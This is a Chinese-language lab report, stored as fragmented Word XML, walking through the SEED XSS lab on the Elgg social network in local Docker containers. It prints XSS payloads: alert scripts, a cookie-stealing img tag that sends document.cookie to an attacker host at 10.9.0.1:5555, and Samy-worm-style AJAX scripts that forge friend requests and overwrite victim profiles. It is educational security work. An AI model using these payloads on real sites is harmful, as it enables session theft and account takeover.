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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>前言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跨站脚本攻击（Cross-site scripting，XSS）是一种安全漏洞，攻击者可以利用这种漏洞在网站上注入恶意的客户端代码。当被攻击者登陆网站时就会自动运行这些恶意代码，从而，攻击者可以突破网站的访问权限，冒充受害者。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind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这里的用的 web应用是Elgg，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Elgg is a web-based social-networking application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；</w:t>
      </w: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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验流程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>准备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服务器，操作系统当前为Centos 7,用户为root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好docker和docker-compose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实验用的安装文件到服务器上，并解压；目录为/opt/labs/XSS/Labsetup；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eedsecuritylabs.org/Labs_20.04/Files/Web_XSS_Elgg/Labsetup.zip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https://seedsecuritylabs.org/Labs_20.04/Files/Web_XSS_Elgg/Labsetup.zip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Labsetup.zip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/opt/labs/XSS/Labsetup目录中，可以看到如下文件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721735" cy="752475"/>
            <wp:effectExtent l="0" t="0" r="1206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部署容器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环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2个容器，一个是运行的是 the web server ，</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IP地址为</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.9.0.5 , 另一个运行的是 MySQ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base ，IP地址为10.9.0.6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2873375"/>
            <wp:effectExtent l="0" t="0" r="635" b="952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网络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network create --driver bridge --subnet 10.9.0.0/24 --gateway 10.9.0.254 net-10.9.0.0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创建</w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="OLE_LINK1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Containers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d /opt/labs/XSS/Labset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-f docker-compose.yml build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="93027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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Container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ker-compose up -d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66690" cy="927735"/>
            <wp:effectExtent l="0" t="0" r="381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环境配置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虚拟机DNS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宿主机的hosts中加入如下语句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seed-server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0.9.0.5 </w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="OLE_LINK3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>www.example32a.com</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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example32b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example32c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0.9.0.5 www.example60.com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10.9.0.5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example70.com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3"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>www.example70.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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库contain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防止数据丢失，将容器中的mysql数据目录指定到本地，名称为mysql_data，所以最好先将本地的该目录删除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rm -rf mysql_data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库中已经为Elgg server服务器创建了很多测试用户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---------------------------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rName | Password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----------------------------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min | seedelgg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ce | seedalice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by | seedboby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rlie | seedcharlie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBd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my | seedsamy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任务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准备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实验中我们需要发送、采集和分析HTTP请求，所以在firefox中先安装插件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTTP Header Live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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2063115"/>
            <wp:effectExtent l="0" t="0" r="3810" b="698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一:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Posting a Malicious Message to Display an Alert Window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Elgg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中嵌入一个JavaScript程序，这样当另一个用户查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>该profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>时，该JavaScript程序将被执行并显示一个警告窗口。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alice用户登录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1421130"/>
            <wp:effectExtent l="0" t="0" r="1016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</w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs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在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Brief description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中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增加</w:t>
      </w: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highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;script&gt;alert(’XSS’);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="967105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1079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然后通过另一个用户登录，比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>charlie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然后访问alice的用户信息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717800"/>
            <wp:effectExtent l="0" t="0" r="381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如果文件过多，可以保存为js文件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&lt;script type="text/javascript"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src="http://www.example.com/myscripts.js"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="yellow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:http://www.example.com为实际填写UR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步骤如下:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="-420" w:leftChars="0" w:firstLine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vim </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/etc/apache2/sites-available</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/000-default.conf 增加如下:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3873500" cy="768350"/>
            <wp:effectExtent l="0" t="0" r="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apache2服务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etc/init.d/apache2 restart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/var/www/Example/目录下创建myscript.js文件，添加JavaScript代码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default" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;script&gt;alert(’XSS’);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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以下输入Brief description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&lt;script type="text/javascript"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>src="http://www.example.com/myscripts.js"&gt;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default"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;/script&gt;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ask 2: Posting a Malicious Message to Display Cookies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印cookie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&lt;script&gt;alert(document.cookie);&lt;/script&gt;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575050" cy="1104900"/>
            <wp:effectExtent l="0" t="0" r="6350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会打印出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="2331085"/>
            <wp:effectExtent l="0" t="0" r="1270" b="571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ask 3: Stealing Cookies from the Victim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Machin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前的任务中，打印的信息只能弹出信息，让使用者看到，而攻击者是看不到的，这个实验的目的就是要把相关信息发送给攻击者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将一个恶意的js文件插入到一个&lt;img&gt;标记中，将其src属性设置为攻击者的机器。 首先浏览器试图加载src字段中的URL; 从而导致向攻击者的机器发送一个HTTP GET请求。 下面给出的JavaScript将cookie发送到攻击者机器的5555端口(IP地址为10.9.0.1)，其中攻击者有一个TCP服务器监听相同的端口。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&lt;script&gt;document.write(’&lt;img src=http://10.9.0.1:5555?c=’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+ escape(document.cookie) + ’ &gt;’);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022350"/>
            <wp:effectExtent l="0" t="0" r="10795" b="635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攻击者端可以使用nc -lknv 5555监控发送过来的数据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1843405"/>
            <wp:effectExtent l="0" t="0" r="8890" b="10795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sk 4: Becoming the Victim’s Friend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任务目的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实验模拟了the Samy Worm。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任务中，首先编写一个恶意的js程序，它直接从受害者的浏览器伪造HTTP请求，而不需要攻击者的干预。 这次攻击的目的是让Samy成为受害者的朋友。 我们已经在Elgg服务器上创建了一个名为Samy的用户(用户名是Samy)。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脚本如下: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ndow.onload = function () {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ts="&amp;__elgg_ts="+elgg.security.token.__elgg_ts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token="&amp;__elgg_token="+elgg.security.token.__elgg_token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ar sendurl="/action/friends/add?friend=56" + ts + token + ts + token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jax=new XMLHttpRequest()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jax.open("GET",sendurl,true)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jax.setRequestHeader("Host","www.seed-server.com")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jax.setRequestHeader("X-Requested-With","XMLHttpRequest")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jax.send();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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="1760855"/>
            <wp:effectExtent l="0" t="0" r="4445" b="444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这里有个小问题，在数据库elgg_seed没有找到用户表，还是在elgg_access_collections中找到owner_guid这个字段，判断了下可能是userid，将friend=后改为56.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Task 5: Modifying the Victim’s Profil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目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被攻击者的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验步骤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script type="text/javascript"&gt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ndow.onload = function()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name="&amp;name="+elgg.session.user.nam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guid="&amp;guid="+elgg.session.user.guid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ts="&amp;__elgg_ts="+elgg.security.token.__elgg_ts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token="&amp;__elgg_token="+elgg.security.token.__elgg_toke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description = "&amp;description=Your profile have been attacked!!!"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content=token + ts + description + guid + nam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ar samyGuid=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="3"/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if(elgg.session.user.guid!=samyGuid)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jax=new XMLHttpRequest(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jax.open("POST",sendurl,true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jax.setRequestHeader("Host","www.seed-server.com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jax.setRequestHeader("Content-type", "application/x-www-form-urlencoded"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Ajax.send(content)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script&gt;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错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-compose报错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[root@labs01 Labsetup]# docker-compose -f docker-compose.yml build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/usr/lib/python2.7/site-packages/paramiko/transport.py:33: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.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from cryptography.hazmat.backends import default_backend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ERROR: The Compose file './docker-compose.yml' is invalid because:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="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networks.net-10.9.0.0 value Additional properties are not allowed ('name' was unexpected)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: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不支持命名网络，可以通过修改下docker-compose.yml版本解决，比如`version: "3.7"`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docker-compose.yml中version为3.7</w:t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3594100" cy="237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BB7B35"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="99BB7B3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202276B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A202276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A73AEB29"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A73AEB2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440524F4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="440524F4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BA08FF4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4BA08F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4DFEA7A5"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4DFEA7A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DF6"/>
    <w:rsid w:val="000079EF"/>
    <w:rsid w:val="00014CF1"/>
    <w:rsid w:val="00016968"/>
    <w:rsid w:val="0002018A"/>
    <w:rsid w:val="00025904"/>
    <w:rsid w:val="000316A2"/>
    <w:rsid w:val="00031ECB"/>
    <w:rsid w:val="00044663"/>
    <w:rsid w:val="00045B86"/>
    <w:rsid w:val="00055659"/>
    <w:rsid w:val="0006542B"/>
    <w:rsid w:val="0007407D"/>
    <w:rsid w:val="00093B9A"/>
    <w:rsid w:val="00094D45"/>
    <w:rsid w:val="00096BDB"/>
    <w:rsid w:val="00097C0D"/>
    <w:rsid w:val="000D205B"/>
    <w:rsid w:val="000D4C30"/>
    <w:rsid w:val="000F3CF7"/>
    <w:rsid w:val="000F4062"/>
    <w:rsid w:val="000F7FD8"/>
    <w:rsid w:val="00104DA6"/>
    <w:rsid w:val="00116AC2"/>
    <w:rsid w:val="00123871"/>
    <w:rsid w:val="00127A49"/>
    <w:rsid w:val="00137A18"/>
    <w:rsid w:val="001512EE"/>
    <w:rsid w:val="001516D2"/>
    <w:rsid w:val="00174866"/>
    <w:rsid w:val="00175B91"/>
    <w:rsid w:val="00176DA8"/>
    <w:rsid w:val="0018455D"/>
    <w:rsid w:val="001972F5"/>
    <w:rsid w:val="00197F3C"/>
    <w:rsid w:val="001A2973"/>
    <w:rsid w:val="001A2AA0"/>
    <w:rsid w:val="001B016F"/>
    <w:rsid w:val="001B3284"/>
    <w:rsid w:val="001B413C"/>
    <w:rsid w:val="001B44C0"/>
    <w:rsid w:val="001C2A00"/>
    <w:rsid w:val="001C351B"/>
    <w:rsid w:val="001C4494"/>
    <w:rsid w:val="001D26FD"/>
    <w:rsid w:val="001D4807"/>
    <w:rsid w:val="001E4B4A"/>
    <w:rsid w:val="001E5A54"/>
    <w:rsid w:val="001F118D"/>
    <w:rsid w:val="001F7CA9"/>
    <w:rsid w:val="00213A04"/>
    <w:rsid w:val="00214F63"/>
    <w:rsid w:val="00220A2F"/>
    <w:rsid w:val="0022433B"/>
    <w:rsid w:val="00240FCC"/>
    <w:rsid w:val="0024186B"/>
    <w:rsid w:val="00247412"/>
    <w:rsid w:val="00247758"/>
    <w:rsid w:val="00250102"/>
    <w:rsid w:val="00250C54"/>
    <w:rsid w:val="00251567"/>
    <w:rsid w:val="00252C96"/>
    <w:rsid w:val="00263BA1"/>
    <w:rsid w:val="00272AA4"/>
    <w:rsid w:val="00277959"/>
    <w:rsid w:val="00277FE0"/>
    <w:rsid w:val="00281518"/>
    <w:rsid w:val="002819C2"/>
    <w:rsid w:val="0028771F"/>
    <w:rsid w:val="0029275F"/>
    <w:rsid w:val="00292CDB"/>
    <w:rsid w:val="00293C02"/>
    <w:rsid w:val="00296ACF"/>
    <w:rsid w:val="00296D3E"/>
    <w:rsid w:val="0029793E"/>
    <w:rsid w:val="002A14FC"/>
    <w:rsid w:val="002A37DE"/>
    <w:rsid w:val="002B1870"/>
    <w:rsid w:val="002C0E55"/>
    <w:rsid w:val="002C0EFC"/>
    <w:rsid w:val="002C1393"/>
    <w:rsid w:val="002C19E8"/>
    <w:rsid w:val="002C4AC2"/>
    <w:rsid w:val="002C7791"/>
    <w:rsid w:val="002C7CE3"/>
    <w:rsid w:val="002D692C"/>
    <w:rsid w:val="002F2A24"/>
    <w:rsid w:val="00300E75"/>
    <w:rsid w:val="00305C4E"/>
    <w:rsid w:val="003245C2"/>
    <w:rsid w:val="00327F02"/>
    <w:rsid w:val="00337137"/>
    <w:rsid w:val="00346C70"/>
    <w:rsid w:val="00347906"/>
    <w:rsid w:val="00361693"/>
    <w:rsid w:val="0036411A"/>
    <w:rsid w:val="00365623"/>
    <w:rsid w:val="00366CD3"/>
    <w:rsid w:val="003722F8"/>
    <w:rsid w:val="00373BEE"/>
    <w:rsid w:val="00376367"/>
    <w:rsid w:val="00376546"/>
    <w:rsid w:val="00386ADF"/>
    <w:rsid w:val="003973A2"/>
    <w:rsid w:val="003A4A00"/>
    <w:rsid w:val="003B067A"/>
    <w:rsid w:val="003B3430"/>
    <w:rsid w:val="003B4217"/>
    <w:rsid w:val="003B5BEC"/>
    <w:rsid w:val="003C2A70"/>
    <w:rsid w:val="003C34CF"/>
    <w:rsid w:val="003D704B"/>
    <w:rsid w:val="003E018F"/>
    <w:rsid w:val="003F25F7"/>
    <w:rsid w:val="003F3E7A"/>
    <w:rsid w:val="003F632B"/>
    <w:rsid w:val="00401EE6"/>
    <w:rsid w:val="00420E9B"/>
    <w:rsid w:val="00426B11"/>
    <w:rsid w:val="00435915"/>
    <w:rsid w:val="004365CE"/>
    <w:rsid w:val="004370E7"/>
    <w:rsid w:val="0044191C"/>
    <w:rsid w:val="00445E5A"/>
    <w:rsid w:val="00454260"/>
    <w:rsid w:val="004545DD"/>
    <w:rsid w:val="0045727A"/>
    <w:rsid w:val="00461A07"/>
    <w:rsid w:val="00464886"/>
    <w:rsid w:val="00466322"/>
    <w:rsid w:val="00467FDC"/>
    <w:rsid w:val="0047009A"/>
    <w:rsid w:val="00473610"/>
    <w:rsid w:val="00483ACD"/>
    <w:rsid w:val="004A3AE6"/>
    <w:rsid w:val="004A4185"/>
    <w:rsid w:val="004B1314"/>
    <w:rsid w:val="004B1615"/>
    <w:rsid w:val="004B304F"/>
    <w:rsid w:val="004B778E"/>
    <w:rsid w:val="004C3B03"/>
    <w:rsid w:val="004C5C33"/>
    <w:rsid w:val="004C5F39"/>
    <w:rsid w:val="004C7D56"/>
    <w:rsid w:val="004D5CCE"/>
    <w:rsid w:val="004E089B"/>
    <w:rsid w:val="004E1B45"/>
    <w:rsid w:val="004F302E"/>
    <w:rsid w:val="004F502C"/>
    <w:rsid w:val="004F7237"/>
    <w:rsid w:val="00505033"/>
    <w:rsid w:val="005062BD"/>
    <w:rsid w:val="005118BA"/>
    <w:rsid w:val="00513643"/>
    <w:rsid w:val="00513BA4"/>
    <w:rsid w:val="00514E1F"/>
    <w:rsid w:val="00521E61"/>
    <w:rsid w:val="00526D2C"/>
    <w:rsid w:val="005345AD"/>
    <w:rsid w:val="005350A6"/>
    <w:rsid w:val="00535ED0"/>
    <w:rsid w:val="00537C7D"/>
    <w:rsid w:val="00540682"/>
    <w:rsid w:val="0054431B"/>
    <w:rsid w:val="00547AA4"/>
    <w:rsid w:val="005558ED"/>
    <w:rsid w:val="00555DF6"/>
    <w:rsid w:val="00563107"/>
    <w:rsid w:val="00572B44"/>
    <w:rsid w:val="00572CCD"/>
    <w:rsid w:val="005736B7"/>
    <w:rsid w:val="005827CF"/>
    <w:rsid w:val="00582A0E"/>
    <w:rsid w:val="00585921"/>
    <w:rsid w:val="00587E93"/>
    <w:rsid w:val="0059671B"/>
    <w:rsid w:val="005A0AFD"/>
    <w:rsid w:val="005A2ABE"/>
    <w:rsid w:val="005A3AA6"/>
    <w:rsid w:val="005A6F56"/>
    <w:rsid w:val="005B0A86"/>
    <w:rsid w:val="005B6EAC"/>
    <w:rsid w:val="005D0BB2"/>
    <w:rsid w:val="005D4632"/>
    <w:rsid w:val="005E3062"/>
    <w:rsid w:val="005F6ABA"/>
    <w:rsid w:val="005F6B4D"/>
    <w:rsid w:val="005F7F96"/>
    <w:rsid w:val="00600BBA"/>
    <w:rsid w:val="00601C05"/>
    <w:rsid w:val="00603234"/>
    <w:rsid w:val="00605FB0"/>
    <w:rsid w:val="00615667"/>
    <w:rsid w:val="0062240E"/>
    <w:rsid w:val="00625179"/>
    <w:rsid w:val="006278C2"/>
    <w:rsid w:val="00632228"/>
    <w:rsid w:val="00634A55"/>
    <w:rsid w:val="00634D6D"/>
    <w:rsid w:val="00636AF4"/>
    <w:rsid w:val="00641A47"/>
    <w:rsid w:val="00642AC8"/>
    <w:rsid w:val="006457E5"/>
    <w:rsid w:val="00646236"/>
    <w:rsid w:val="00647547"/>
    <w:rsid w:val="0065285F"/>
    <w:rsid w:val="006546CC"/>
    <w:rsid w:val="00662A64"/>
    <w:rsid w:val="00662C27"/>
    <w:rsid w:val="00663109"/>
    <w:rsid w:val="00664131"/>
    <w:rsid w:val="00670512"/>
    <w:rsid w:val="00672CCA"/>
    <w:rsid w:val="0067390F"/>
    <w:rsid w:val="006A1161"/>
    <w:rsid w:val="006A7663"/>
    <w:rsid w:val="006C4A5A"/>
    <w:rsid w:val="006C4C5A"/>
    <w:rsid w:val="006E56D7"/>
    <w:rsid w:val="006F1E86"/>
    <w:rsid w:val="006F2A69"/>
    <w:rsid w:val="006F5462"/>
    <w:rsid w:val="007006E4"/>
    <w:rsid w:val="007028B3"/>
    <w:rsid w:val="00715F48"/>
    <w:rsid w:val="0071772F"/>
    <w:rsid w:val="007245C8"/>
    <w:rsid w:val="00731FB8"/>
    <w:rsid w:val="00755776"/>
    <w:rsid w:val="0075748B"/>
    <w:rsid w:val="00763A7C"/>
    <w:rsid w:val="00771088"/>
    <w:rsid w:val="0077156E"/>
    <w:rsid w:val="00775977"/>
    <w:rsid w:val="00777B37"/>
    <w:rsid w:val="007841D7"/>
    <w:rsid w:val="00784971"/>
    <w:rsid w:val="0079043D"/>
    <w:rsid w:val="007953BB"/>
    <w:rsid w:val="00796236"/>
    <w:rsid w:val="007B798A"/>
    <w:rsid w:val="007C08BB"/>
    <w:rsid w:val="007C28E4"/>
    <w:rsid w:val="007D083A"/>
    <w:rsid w:val="007D0D86"/>
    <w:rsid w:val="007D186C"/>
    <w:rsid w:val="007E4039"/>
    <w:rsid w:val="007E5283"/>
    <w:rsid w:val="007F3739"/>
    <w:rsid w:val="007F3EAD"/>
    <w:rsid w:val="0080062F"/>
    <w:rsid w:val="00812974"/>
    <w:rsid w:val="00816A6C"/>
    <w:rsid w:val="00816C29"/>
    <w:rsid w:val="00826983"/>
    <w:rsid w:val="0083160A"/>
    <w:rsid w:val="008327A4"/>
    <w:rsid w:val="00854F36"/>
    <w:rsid w:val="00856F07"/>
    <w:rsid w:val="00863E10"/>
    <w:rsid w:val="00864757"/>
    <w:rsid w:val="008652CB"/>
    <w:rsid w:val="00867DDD"/>
    <w:rsid w:val="008738ED"/>
    <w:rsid w:val="0087448A"/>
    <w:rsid w:val="0087565D"/>
    <w:rsid w:val="00883A47"/>
    <w:rsid w:val="00885AB0"/>
    <w:rsid w:val="0089095A"/>
    <w:rsid w:val="00891417"/>
    <w:rsid w:val="00893E6F"/>
    <w:rsid w:val="008A5DC2"/>
    <w:rsid w:val="008A620D"/>
    <w:rsid w:val="008C2A93"/>
    <w:rsid w:val="008C387C"/>
    <w:rsid w:val="008D622B"/>
    <w:rsid w:val="008D7921"/>
    <w:rsid w:val="008F22E8"/>
    <w:rsid w:val="008F2E01"/>
    <w:rsid w:val="008F4E7C"/>
    <w:rsid w:val="008F6FE8"/>
    <w:rsid w:val="008F7DF2"/>
    <w:rsid w:val="009123A8"/>
    <w:rsid w:val="00925114"/>
    <w:rsid w:val="00925786"/>
    <w:rsid w:val="009271AF"/>
    <w:rsid w:val="009319BA"/>
    <w:rsid w:val="0093590D"/>
    <w:rsid w:val="0094011E"/>
    <w:rsid w:val="00941A41"/>
    <w:rsid w:val="00950892"/>
    <w:rsid w:val="00952244"/>
    <w:rsid w:val="009628A1"/>
    <w:rsid w:val="00964003"/>
    <w:rsid w:val="0097097A"/>
    <w:rsid w:val="00981F15"/>
    <w:rsid w:val="00982AC0"/>
    <w:rsid w:val="00995120"/>
    <w:rsid w:val="00995A6F"/>
    <w:rsid w:val="009A2C0A"/>
    <w:rsid w:val="009A34C8"/>
    <w:rsid w:val="009A7637"/>
    <w:rsid w:val="009B158E"/>
    <w:rsid w:val="009B3F68"/>
    <w:rsid w:val="009C2B39"/>
    <w:rsid w:val="009C78BA"/>
    <w:rsid w:val="009E3FE1"/>
    <w:rsid w:val="009F0026"/>
    <w:rsid w:val="009F6A5A"/>
    <w:rsid w:val="00A00AA6"/>
    <w:rsid w:val="00A02583"/>
    <w:rsid w:val="00A10A03"/>
    <w:rsid w:val="00A2748D"/>
    <w:rsid w:val="00A3436F"/>
    <w:rsid w:val="00A50246"/>
    <w:rsid w:val="00A56C2A"/>
    <w:rsid w:val="00A652EE"/>
    <w:rsid w:val="00A7278F"/>
    <w:rsid w:val="00A7650D"/>
    <w:rsid w:val="00A85F5A"/>
    <w:rsid w:val="00A86634"/>
    <w:rsid w:val="00A9554D"/>
    <w:rsid w:val="00A96EB2"/>
    <w:rsid w:val="00AA5388"/>
    <w:rsid w:val="00AA5E7F"/>
    <w:rsid w:val="00AA759A"/>
    <w:rsid w:val="00AB1EEB"/>
    <w:rsid w:val="00AB6767"/>
    <w:rsid w:val="00AB77D9"/>
    <w:rsid w:val="00AC4232"/>
    <w:rsid w:val="00AD4F96"/>
    <w:rsid w:val="00AD51C1"/>
    <w:rsid w:val="00AD718D"/>
    <w:rsid w:val="00AE0F13"/>
    <w:rsid w:val="00AE1453"/>
    <w:rsid w:val="00AE4295"/>
    <w:rsid w:val="00AE7486"/>
    <w:rsid w:val="00AF26EA"/>
    <w:rsid w:val="00AF33D9"/>
    <w:rsid w:val="00AF58BB"/>
    <w:rsid w:val="00B05129"/>
    <w:rsid w:val="00B07EBB"/>
    <w:rsid w:val="00B13D6A"/>
    <w:rsid w:val="00B2682D"/>
    <w:rsid w:val="00B425D6"/>
    <w:rsid w:val="00B42694"/>
    <w:rsid w:val="00B56840"/>
    <w:rsid w:val="00B61F41"/>
    <w:rsid w:val="00B633A2"/>
    <w:rsid w:val="00B64E44"/>
    <w:rsid w:val="00B66BD3"/>
    <w:rsid w:val="00B84E93"/>
    <w:rsid w:val="00B86153"/>
    <w:rsid w:val="00B90304"/>
    <w:rsid w:val="00B90AAD"/>
    <w:rsid w:val="00B9134C"/>
    <w:rsid w:val="00B95873"/>
    <w:rsid w:val="00BA1EA5"/>
    <w:rsid w:val="00BA57A6"/>
    <w:rsid w:val="00BB25F7"/>
    <w:rsid w:val="00BB60B8"/>
    <w:rsid w:val="00BB69F2"/>
    <w:rsid w:val="00BB6E5C"/>
    <w:rsid w:val="00BC43FD"/>
    <w:rsid w:val="00BC4F19"/>
    <w:rsid w:val="00BC6663"/>
    <w:rsid w:val="00BD693D"/>
    <w:rsid w:val="00BE053F"/>
    <w:rsid w:val="00BE233C"/>
    <w:rsid w:val="00BE4EDE"/>
    <w:rsid w:val="00BE59AD"/>
    <w:rsid w:val="00BF5313"/>
